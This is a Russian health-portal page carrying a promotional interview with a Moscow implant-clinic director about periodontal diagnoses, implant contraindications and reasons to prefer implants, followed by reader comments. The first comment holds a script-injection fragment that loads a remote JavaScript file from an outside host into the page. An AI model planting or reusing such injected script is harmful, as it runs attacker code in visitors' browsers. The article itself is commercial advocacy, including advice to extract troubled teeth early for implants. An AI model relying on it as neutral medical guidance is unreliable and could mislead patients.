Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Право на красивую улыбку  >>  Право на красивую улыбку
 
Обратная связь
 

Право на красивую улыбку

Размер шрифта
11 февраля 2011 00:00
  • google_analytics: false
  • Нравится

Имплантация зубов – метод, имеющий особую историю в России. Долгое время он был окружен массой легенд и мифов.

Это объясняется тем, что до недавнего времени традиционно не было четкого понимания терминологии, в том числе порой и на профессиональном уровне – при постановке диагноза. Случалось, что врачи не всегда обладали необходимым опытом и знаниями в области имплантологии.


Как обстоят дела сегодня?

Наш эксперт – один из наиболее авторитетных специалистов мирового класса в области имплантологии, Борис Павлович АГАМИ.

Борис Павлович АГАМИ, доктор медицины, хирург-имплантолог, выпускник факультета стоматологии Иерусалимского университета, почетный член американской ассоциации «Альфа-Омега» и Канадского общества стоматологов, руководитель клиники «Agami Center» (Москва).

«В советские времена было принято все заболевания пародонта объединять одним термином «пародонтоз». Поэтому нередко вердикт врача звучал: «Парадонтоз. Импланты ставить нельзя». Но ведь пародонтоз – самостоятельное и довольно редкое (встречается всего у 2% людей) заболевание, при котором по невыясненным пока еще причинам происходят убыль костной ткани и потеря зубов. Отличительная особенность заболевания – отсутствие воспаления, гноя и запаха изо рта. Сейчас больше ориентируются на европейскую классификацию, которая разделяет гингивит, пародонтит и пародонтоз. И здесь, как, впрочем, и всегда в медицине, точность диагноза – гарантия оптимальной работы с проблемой».

Большая разница

Оказывается, мы часто становимся жертвами не только неточной диагностики, но и абсолютно «самодеятельных» диагнозов, которые все еще ставим себе сами, почему-то исходя из соображений «наследственности» и богатого опыта знакомых (в том числе, и по версии «тети Маши, подруги моей бабушки»).

Борис Павлович АГАМИ:

«Самодиагностикой занимаются многие. Три четверти пациентов считают, что у них пародонтоз, если оголилась шейка зуба. Обследования же показывают, что атрофии костной ткани нет. Мой совет: не занимайтесь самодиагностикой и не слушайте всех подряд. Пройдите консультацию в клинике, которая уже долгие годы профессионально занимается имплантацией зубов, сделайте томограмму, обсудите с врачом нюансы и прогнозы лечения и примите вместе с ним оптимальное для вас решение».

Гингивит – это начальное воспаление десны, обусловленное неблагоприятным воздействием местных и общих факторов и протекающее без нарушения целостности зубодесневого соединения.

Пародонтит это заболевание, при котором воспаление с десны распространяется на другие ткани пародонта. Пародонтит характеризуется прогрессирующим разрушением тканей периодонта, костной ткани. Пародонтит может быть острым и хроническим.

Пародонтоз это поражение тканей пародонта первично-дистрофического характера. Воспаление отсутствует.

Импланты можно ставить в любом случае – но только после устранения воспаления (гингивит, пародонтит). При воспалительном процессе (который для пародонтоза не характерен) имплантацию не проводят, так как воспаление может усилиться после имплантации. Сначала устраняют эти заболевания, которые сегодня вполне успешно лечатся, а потом устанавливают импланты.

При пародонтозе имплантация НЕ противопоказана.

«Как раз при пародонтозе имплантация – замечательное средство восстановление зубного ряда. В странах с высоким уровнем стоматологической помощи пациентам как раз рекомендуют выполнять имплантацию, а не терять годы и зубы», – говорит Борис Павлович АГАМИ.

Мифы об имплантации

Когда в России только начали ставить импланты, противопоказанием служило буквально все. Говорили даже, что летом такую процедуру выполнять хуже, чем зимой. Были годы, когда врачи вообще не советовали ставить импланты, поскольку не знали, как их ставить.

Сегодня противопоказания четко обозначены:

  • СПИД
  • Гепатит С
  • Патология щитовидной железы
  • Химиотерапия при онкологии
  • Системные заболевания крови
  • Серьезные нарушения психики

Даже сахарный диабет является относительным противопоказанием.

Как правило, врачи, которые говорят, что при пародонтозе импланты не ставят, просто не владеют технологией или у них нет соответствующего оборудования. Вот и вводят в заблуждение пациентов, рекомендуя им «по старинке» съемные протезы.

Почему импланты – лучше

Несколько значимых преимуществ имплантации зубов

  • Возможность восстановить утраченный зуб, не обтачивая соседние зубы! Находящиеся рядом зубы остаются живыми.
  • Возможность установить несъемный протез при отсутствии нескольких зубов имплантат выступит в качестве опоры.
  • Имплантаты дают возможность протезирования полностью беззубой челюсти более удобными несъемными конструкциями. Вы навсегда избавитесь от неудобных съемных протезов!
  • Имплантат не только решает проблему отсутствующих зубов, но также снимает лишнюю нагрузку с соседних зубов и, следовательно, сохраняет их.
  • Новый искусственный зуб ощущается, функционирует и выглядит, как естественный здоровый зуб.
  • Известно, что длительное отсутствие зубов приводит к атрофии кости. Имплантаты позволяют сохранить кость челюсти и избежать деформации овала лица: правильное распределение нагрузки при жевании дает возможность сохранить уровень костной ткани.

Как будет держаться имплант, если не устоял даже родной зуб?

Борис Павлович АГАМИ:

«Поверхность импланта такова, что при сращивании его с костью конструкция оказывается даже прочнее, чем у родного зуба. При соответствующем уходе (каждые полгода нужно обязательно ходить к гигиенисту на чистку) импланты стоят очень долго, до 25 лет».

Долговечность искусственных зубов обусловлена и новейшими технологиями, и квалификацией специалистов, их владением этими технологиями, и тщательным соблюдением гигиенических правил.

Обычно в договор с пациентом клиника, устанавливающая импланты, включает условие о регулярной явке на профессиональную чистку зубов.

И самое главное – оптимально, если количество установленных имплантатов соответствует числу потерянных зубов. Таким образом достигается оптимальная нагрузка на костную ткань и исключается ее дальнейшая атрофия.

Сохранить или отказаться?

Действительно, есть ли смысл сохранять зубы, если уже начались проблемы с их устойчивостью?

Имплантологи рекомендуют удалить зубы и поставить импланты. И это правильно, потому что чем дольше отсутствует нормальная нагрузка на кость, тем быстрее она атрофируется. А если вовремя удалить проблемный зуб, есть шанс поставить имплант, даже не прибегая к костной пластике. Поэтому пациент, который, порой, «сколько мог спасал зубы, да не спас», и желающий поставить импланты, может оказаться в ситуации, когда эти импланты уже и ставить некуда. И только длительная процедура костной пластики может спасти его от съемных протезов. Можно долго стараться удержать «свои» зубы на местах, прибегать к шинированию и прочим методам, которые не решают проблему, но они только отодвигают финал – съемные протезы.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 21:28

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

01 июля 2015 в 00:21

Комментарий удален за нарушение Правил общения

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.